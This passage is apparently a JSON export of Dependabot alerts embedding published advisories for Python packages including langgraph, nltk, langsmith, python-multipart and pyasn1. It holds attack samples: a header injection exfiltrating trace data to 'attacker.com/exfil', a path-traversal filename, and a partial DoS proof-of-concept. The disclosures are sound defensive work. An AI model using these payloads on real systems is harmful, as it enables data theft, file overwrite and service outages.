weakens the protection).\n\n## LangSmith / hosted deployments note\nLangSmith is not aware of this issue presenting risk to existing LangSmith-hosted deployments. 
The described threat model requires an attacker to tamper with the checkpoint persistence layer used by the deployment; typical hosted configurations are designed to prevent such access.\n\nFirst reported by: yardenporat353","severity":"medium","identifiers":[{"value":"GHSA-g48c-2wqr-h844","type":"GHSA"},{"value":"CVE-2026-28277","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-g48c-2wqr-h844"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28277"},{"url":"https://github.com/advisories/GHSA-g48c-2wqr-h844"}],"published_at":"2026-03-05T20:19:49Z","updated_at":"2026-03-09T13:19:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 1.0.9","first_patched_version":{"identifier":"1.0.10"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00332,"percentile":0.56073},"cvss":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 
1.0.9","first_patched_version":{"identifier":"1.0.10"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/25","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/25","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":24,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-mhr3-j7m5-c7c9","cve_id":"CVE-2026-27794","summary":"LangGraph: BaseCache Deserialization of Untrusted Data may lead to Remote Code Execution ","description":"## Context\n\nA Remote Code Execution vulnerability exists in LangGraph's caching layer when applications enable cache backends that inherit from `BaseCache` and opt nodes into caching via `CachePolicy`. Prior to `langgraph-checkpoint` 4.0.0, `BaseCache` defaults to `JsonPlusSerializer(pickle_fallback=True)`. When msgpack serialization fails, cached values can be deserialized via `pickle.loads(...)`.\n\n### Who is affected?\n\nCaching is not enabled by default. 
Applications are affected only when:\n\n- The application explicitly enables a cache backend (for example by passing `cache=...` to `StateGraph.compile(...)` or otherwise configuring a `BaseCache` implementation)\n- One or more nodes opt into caching via `CachePolicy`\n- The attacker can write to the cache backend (for example a network-accessible Redis instance with weak/no auth, shared cache infrastructure reachable by other tenants/services, or a writable SQLite cache file)\n\nExample (enabling a cache backend and opting a node into caching):\n\n```py\nfrom langgraph.cache.memory import InMemoryCache\nfrom langgraph.graph import StateGraph\nfrom langgraph.types import CachePolicy\n\n\ndef my_node(state: dict) -> dict:\n return {\"value\": state.get(\"value\", 0) + 1}\n\n\nbuilder = StateGraph(dict)\nbuilder.add_node(\"my_node\", my_node, cache_policy=CachePolicy(ttl=120))\nbuilder.set_entry_point(\"my_node\")\n\ngraph = builder.compile(cache=InMemoryCache())\n\nresult = graph.invoke({\"value\": 1})\n```\n\nWith `pickle_fallback=True`, when msgpack serialization fails, `JsonPlusSerializer` can fall back to storing values as a `(\"pickle\", )` tuple and later deserialize them via `pickle.loads(...)`. If an attacker can place a malicious pickle payload into the cache backend such that the LangGraph process reads and deserializes it, this can lead to arbitrary code execution.\n\nExploitation requires attacker write access to the cache backend. 
The serializer is not exposed as a network-facing API.\n\nThis is fixed in `langgraph-checkpoint>=4.0.0` by disabling pickle fallback by default (`pickle_fallback=False`).\n\n## Impact\n\nArbitrary code execution in the LangGraph process when attacker-controlled cache entries are deserialized.\n\n## Root Cause\n\n- `BaseCache` default serializer configuration inherited by cache implementations (`InMemoryCache`, `RedisCache`, `SqliteCache`):\n - `libs/checkpoint/langgraph/cache/base/__init__.py` (pre-fix default: `JsonPlusSerializer(pickle_fallback=True)`)\n\n- `JsonPlusSerializer` deserialization sink:\n - `libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py`\n - `loads_typed(...)` calls `pickle.loads(data_)` when `type_ == \"pickle\"` and pickle fallback is enabled\n\n## Attack preconditions\n\nAn attacker must be able to write attacker-controlled bytes into the cache backend such that the LangGraph process later reads and deserializes them.\n\nThis typically requires write access to a networked cache (for example a network-accessible Redis instance with weak/no auth or shared cache infrastructure reachable by other tenants/services) or write access to local cache storage (for example a writable SQLite cache file via permissive file permissions or a shared writable volume).\n\nBecause exploitation requires write access to the cache storage layer, this is a post-compromise / post-access escalation vector.\n\n## Remediation\n\n- Upgrade to `langgraph-checkpoint>=4.0.0`.\n\n## Resources\n\n- ZDI-CAN-28385\n- Patch: https://github.com/langchain-ai/langgraph/pull/6677\n- Patch diff: https://patch-diff.githubusercontent.com/raw/langchain-ai/langgraph/pull/6677.patch\n- Credit: Peter Girnus (@gothburz), Demeng Chen, and Brandon Niemczyk (Trend Micro Zero Day 
Initiative)","severity":"medium","identifiers":[{"value":"GHSA-mhr3-j7m5-c7c9","type":"GHSA"},{"value":"CVE-2026-27794","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-mhr3-j7m5-c7c9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27794"},{"url":"https://github.com/langchain-ai/langgraph/pull/6677"},{"url":"https://github.com/langchain-ai/langgraph/commit/f91d79d0c86932ded6e3b9f195d5a0bbd5aef99c"},{"url":"https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D4.0.0"},{"url":"https://github.com/advisories/GHSA-mhr3-j7m5-c7c9"}],"published_at":"2026-02-25T22:59:12Z","updated_at":"2026-02-25T22:59:14Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 4.0.0","first_patched_version":{"identifier":"4.0.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00366,"percentile":0.5857},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 
4.0.0","first_patched_version":{"identifier":"4.0.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/24","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/24","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":23,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-7p94-766c-hgjp","cve_id":"CVE-2025-14009","summary":"NLTK has a Zip Slip Vulnerability","description":"A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. 
This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.","severity":"critical","identifiers":[{"value":"GHSA-7p94-766c-hgjp","type":"GHSA"},{"value":"CVE-2025-14009","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-14009"},{"url":"https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4"},{"url":"https://github.com/nltk/nltk/pull/3468"},{"url":"https://github.com/nltk/nltk/commit/1056b323af6462455571302e766b67cf300aea18"},{"url":"https://github.com/nltk/nltk/blob/4154eb85e832f266660a09286c7e37e308292284/ChangeLog#L1"},{"url":"https://github.com/advisories/GHSA-7p94-766c-hgjp"}],"published_at":"2026-02-18T18:30:40Z","updated_at":"2026-02-25T20:23:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 3.9.2","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00878,"percentile":0.75402},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cwes":[{"cwe_id":"CWE-94","name":"Improper Control of Generation of Code ('Code Injection')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 
3.9.2","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/23","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/23","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":22,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2g6r-c272-w58r","cve_id":"CVE-2026-26013","summary":"LangChain affected by SSRF via image_url token counting in ChatOpenAI.get_num_tokens_from_messages","description":"## Server-Side Request Forgery (SSRF) in ChatOpenAI Image Token Counting\n\n### Summary\nThe `ChatOpenAI.get_num_tokens_from_messages()` method fetches arbitrary `image_url` values without validation when computing token counts for vision-enabled models. 
This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.\n\n### Severity\n**Low** - The vulnerability allows SSRF attacks but has limited impact due to:\n- Responses are not returned to the attacker (blind SSRF)\n- Default 5-second timeout limits resource exhaustion\n- Non-image responses fail at PIL image parsing\n\n### Impact\nAn attacker who can control image URLs passed to `get_num_tokens_from_messages()` can:\n- Trigger HTTP requests from the application server to arbitrary internal or external URLs\n- Cause the server to access internal network resources (private IPs, cloud metadata endpoints)\n- Cause minor resource consumption through image downloads (bounded by timeout)\n\n**Note:** This vulnerability occurs during token counting, which may happen outside of model invocation (e.g., in logging, metrics, or token budgeting flows).\n\n### Details\nThe vulnerable code path:\n1. `get_num_tokens_from_messages()` processes messages containing `image_url` content blocks\n2. For images without `detail: \"low\"`, it calls `_url_to_size()` to fetch the image and compute token counts\n3. `_url_to_size()` performs `httpx.get(image_source)` on any URL without validation\n4. Prior to the patch, there was no SSRF protection, size limits, or explicit timeout\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py`\n\n### Patches\nThe vulnerability has been patched in `langchain-openai==1.1.9` (requires `langchain-core==1.2.11`).\n\nThe patch adds:\n1. **SSRF validation** using `langchain_core._security._ssrf_protection.validate_safe_url()` to block:\n - Private IP ranges (RFC 1918, loopback, link-local)\n - Cloud metadata endpoints (169.254.169.254, etc.)\n - Invalid URL schemes\n2. **Explicit size limits** (50 MB maximum, matching OpenAI's payload limit)\n3. **Explicit timeout** (5 seconds, same as `httpx.get` default)\n4. 
**Allow disabling image fetching** via `allow_fetching_images=False` parameter\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n1. **Sanitize input:** Validate and filter `image_url` values before passing messages to token counting or model invocation\n2. **Use network controls:** Implement egress filtering to prevent outbound requests to private IPs","severity":"low","identifiers":[{"value":"GHSA-2g6r-c272-w58r","type":"GHSA"},{"value":"CVE-2026-26013","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-2g6r-c272-w58r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26013"},{"url":"https://github.com/langchain-ai/langchain/commit/2b4b1dc29a833d4053deba4c2b77a3848c834565"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.11"},{"url":"https://github.com/advisories/GHSA-2g6r-c272-w58r"}],"published_at":"2026-02-11T14:23:13Z","updated_at":"2026-02-11T14:23:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 1.2.11","first_patched_version":{"identifier":"1.2.11"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0505},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 
1.2.11","first_patched_version":{"identifier":"1.2.11"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/22","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/22","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":21,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-r6ph-v2qm-q3c2","cve_id":"CVE-2026-26007","summary":"cryptography Vulnerable to a Subgroup Attack Due to Missing Subgroup Validation for SECT Curves","description":"## Vulnerability Summary\n\nThe `public_key_from_numbers` (or `EllipticCurvePublicNumbers.public_key()`), `EllipticCurvePublicNumbers.public_key()`, `load_der_public_key()` and `load_pem_public_key()` functions do not verify that the point belongs to the expected prime-order subgroup of the curve.\n\nThis missing validation allows an attacker to provide a public key point `P` from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as `S = [victim_private_key]P` via ECDH, this leaks information about `victim_private_key mod (small_subgroup_order)`. For curves with cofactor > 1, this reveals the least significant bits of the private key. 
When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup.\n\nOnly SECT curves are impacted by this.\n\n## Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine","severity":"high","identifiers":[{"value":"GHSA-r6ph-v2qm-q3c2","type":"GHSA"},{"value":"CVE-2026-26007","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"},{"url":"https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"},{"url":"https://github.com/pyca/cryptography/releases/tag/46.0.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26007"},{"url":"http://www.openwall.com/lists/oss-security/2026/02/10/4"},{"url":"https://github.com/advisories/GHSA-r6ph-v2qm-q3c2"}],"published_at":"2026-02-10T21:27:06Z","updated_at":"2026-02-13T08:47:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 46.0.4","first_patched_version":{"identifier":"46.0.5"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","score":8.2}},"epss":{"percentage":9.0e-05,"percentile":0.00867},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 
46.0.4","first_patched_version":{"identifier":"46.0.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/21","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/21","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":20,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-v34v-rq6j-cj6p","cve_id":"CVE-2026-25528","summary":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","description":"## Summary\n\nThe LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n ```\n baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL\n\n3. 
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith>=0.6.3`\n- **JavaScript:** `npm install langsmith@>=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic","severity":"medium","identifiers":[{"value":"GHSA-v34v-rq6j-cj6p","type":"GHSA"},{"value":"CVE-2026-25528","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25528"},{"url":"https://github.com/advisories/GHSA-v34v-rq6j-cj6p"}],"published_at":"2026-02-09T20:36:59Z","updated_at":"2026-02-09T22:39:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.3.41, < 
0.4.6","first_patched_version":{"identifier":"0.4.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00014,"percentile":0.02521},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/20","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/20","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":19,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"protobuf"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-7gcm-g887-7qv7","cve_id":"CVE-2026-0994","summary":"protobuf affected by a JSON recursion depth bypass","description":"A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a 
RecursionError.","severity":"high","identifiers":[{"value":"GHSA-7gcm-g887-7qv7","type":"GHSA"},{"value":"CVE-2026-0994","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0994"},{"url":"https://github.com/protocolbuffers/protobuf/pull/25239"},{"url":"https://github.com/protocolbuffers/protobuf/issues/25070"},{"url":"https://github.com/protocolbuffers/protobuf/commit/d2b001626d137c62dfee6c88c87324102531868b"},{"url":"https://github.com/protocolbuffers/protobuf/commit/5ebddcb1bcbe51d1fe323baa145e85f4f23128cf"},{"url":"https://github.com/advisories/GHSA-7gcm-g887-7qv7"}],"published_at":"2026-01-23T15:31:35Z","updated_at":"2026-02-05T15:47:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":">= 6.30.0rc1, <= 6.33.4","first_patched_version":{"identifier":"6.33.5"}},{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 5.29.6","first_patched_version":{"identifier":"5.29.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L","score":8.2}},"epss":{"percentage":0.00013,"percentile":0.02136},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 
5.29.6","first_patched_version":{"identifier":"5.29.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/19","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/19","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":18,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-wp53-j4wj-2cfg","cve_id":"CVE-2026-24486","summary":"Python-Multipart has Arbitrary File Write via Non-Default Configuration","description":"### Summary\n\nA Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename.\n\n### Details\n\nWhen `UPLOAD_DIR` is set and `UPLOAD_KEEP_FILENAME` is `True`, the library constructs the file path using `os.path.join(file_dir, fname)`. Due to the behavior of `os.path.join()`, if the filename begins with a `/`, all preceding path components are discarded:\n\n```py\nos.path.join(\"/upload/dir\", \"/etc/malicious\") == \"/etc/malicious\"\n```\n \nThis allows an attacker to bypass the intended upload directory and write files to arbitrary paths. \n \n#### Affected Configuration \n \nProjects are only affected if all of the following are true: \n- `UPLOAD_DIR` is set\n- `UPLOAD_KEEP_FILENAME` is set to True\n- The uploaded file exceeds `MAX_MEMORY_FILE_SIZE` (triggering a flush to disk)\n\nThe default configuration is not vulnerable. \n \n#### Impact \n \nArbitrary file write to attacker-controlled paths on the filesystem. 
\n \n#### Mitigation \n \nUpgrade to version 0.0.22, or avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.","severity":"high","identifiers":[{"value":"GHSA-wp53-j4wj-2cfg","type":"GHSA"},{"value":"CVE-2026-24486","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg"},{"url":"https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24486"},{"url":"https://github.com/advisories/GHSA-wp53-j4wj-2cfg"}],"published_at":"2026-01-26T23:28:05Z","updated_at":"2026-01-29T03:24:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.22","first_patched_version":{"identifier":"0.0.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00958,"percentile":0.76549},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 
0.0.22","first_patched_version":{"identifier":"0.0.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/18","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/18","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":17,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-63vm-454h-vhhq","cve_id":"CVE-2026-23490","summary":"pyasn1 has a DoS vulnerability in decoder","description":"### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n print(\"[*] Memory limit set to 100MB\")\nexcept:\n print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b'\\x81' * payload_size + b'\\x00'\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length < 128:\n length_bytes = 
